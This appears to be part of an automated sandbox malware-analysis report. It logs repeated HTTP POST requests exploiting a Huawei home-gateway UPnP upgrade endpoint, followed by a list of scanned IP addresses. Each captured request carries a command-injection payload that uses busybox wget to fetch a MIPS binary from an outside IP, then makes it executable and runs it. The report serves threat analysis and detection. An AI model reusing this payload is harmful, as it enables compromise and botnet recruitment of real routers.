6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: unknownTCP traffic detected without corresponding DNS query: 41.253.54.214
                Source: unknownTCP traffic detected without corresponding DNS query: 41.25.99.190
                Source: unknownTCP traffic detected without corresponding DNS query: 41.24.33.192
                Source: unknownTCP traffic detected without corresponding DNS query: 157.180.28.183
                Source: unknownTCP traffic detected without corresponding DNS query: 157.35.60.48
                Source: unknownTCP traffic detected without corresponding DNS query: 157.180.173.191
                Source: unknownTCP traffic detected without corresponding DNS query: 197.93.16.112
                Source: unknownTCP traffic detected without corresponding DNS query: 14.200.223.32
                Source: unknownTCP traffic detected without corresponding DNS query: 41.74.194.211
                Source: unknownTCP traffic detected without corresponding DNS query: 157.238.133.247
                Source: unknownTCP traffic detected without corresponding DNS query: 157.46.117.85
                Source: unknownTCP traffic detected without corresponding DNS query: 76.254.221.237
                Source: unknownTCP traffic detected without corresponding DNS query: 157.158.61.23
                Source: unknownTCP traffic detected without corresponding DNS query: 157.239.105.202
                Source: unknownTCP traffic detected without corresponding DNS query: 132.117.166.187
                Source: unknownTCP traffic detected without corresponding DNS query: 197.188.173.27
                Source: unknownTCP traffic detected without corresponding DNS query: 157.168.238.158
                Source: unknownTCP traffic detected without corresponding DNS query: 41.205.176.172
                Source: unknownTCP traffic detected without corresponding DNS query: 104.26.16.169
                Source: unknownTCP traffic detected without corresponding DNS query: 84.15.201.207
                Source: unknownTCP traffic detected without corresponding DNS query: 197.132.126.127
                Source: unknownTCP traffic detected without corresponding DNS query: 141.230.63.70
                Source: unknownTCP traffic detected without corresponding DNS query: 197.233.38.30
                Source: unknownTCP traffic detected without corresponding DNS query: 157.197.52.210
                Source: unknownTCP traffic detected without corresponding DNS query: 75.123.100.201
                Source: unknownTCP traffic detected without corresponding DNS query: 197.225.2.255
                Source: unknownTCP traffic detected without corresponding DNS query: 157.189.14.204
                Source: unknownTCP traffic detected without corresponding DNS query: 197.214.69.128
                Source: unknownTCP traffic detected without corresponding DNS query: 41.157.25.231
                Source: unknownTCP traffic detected without corresponding DNS query: 41.247.124.128
                Source: unknownTCP traffic detected without corresponding DNS query: 157.207.9.185
                Source: unknownTCP traffic detected without corresponding DNS query: 197.70.184.219
                Source: unknownTCP traffic detected without corresponding DNS query: 157.242.182.173
                Source: unknownTCP traffic detected without corresponding DNS query: 41.22.233.248
                Source: unknownTCP traffic detected without corresponding DNS query: 41.86.141.198
                Source: unknownTCP traffic detected without corresponding DNS query: 41.189.123.241
                Source: unknownTCP traffic detected without corresponding DNS query: 197.151.53.151
                Source: unknownTCP traffic detected without corresponding DNS query: 197.32.143.1
                Source: unknownTCP traffic detected without corresponding DNS query: 157.42.192.27
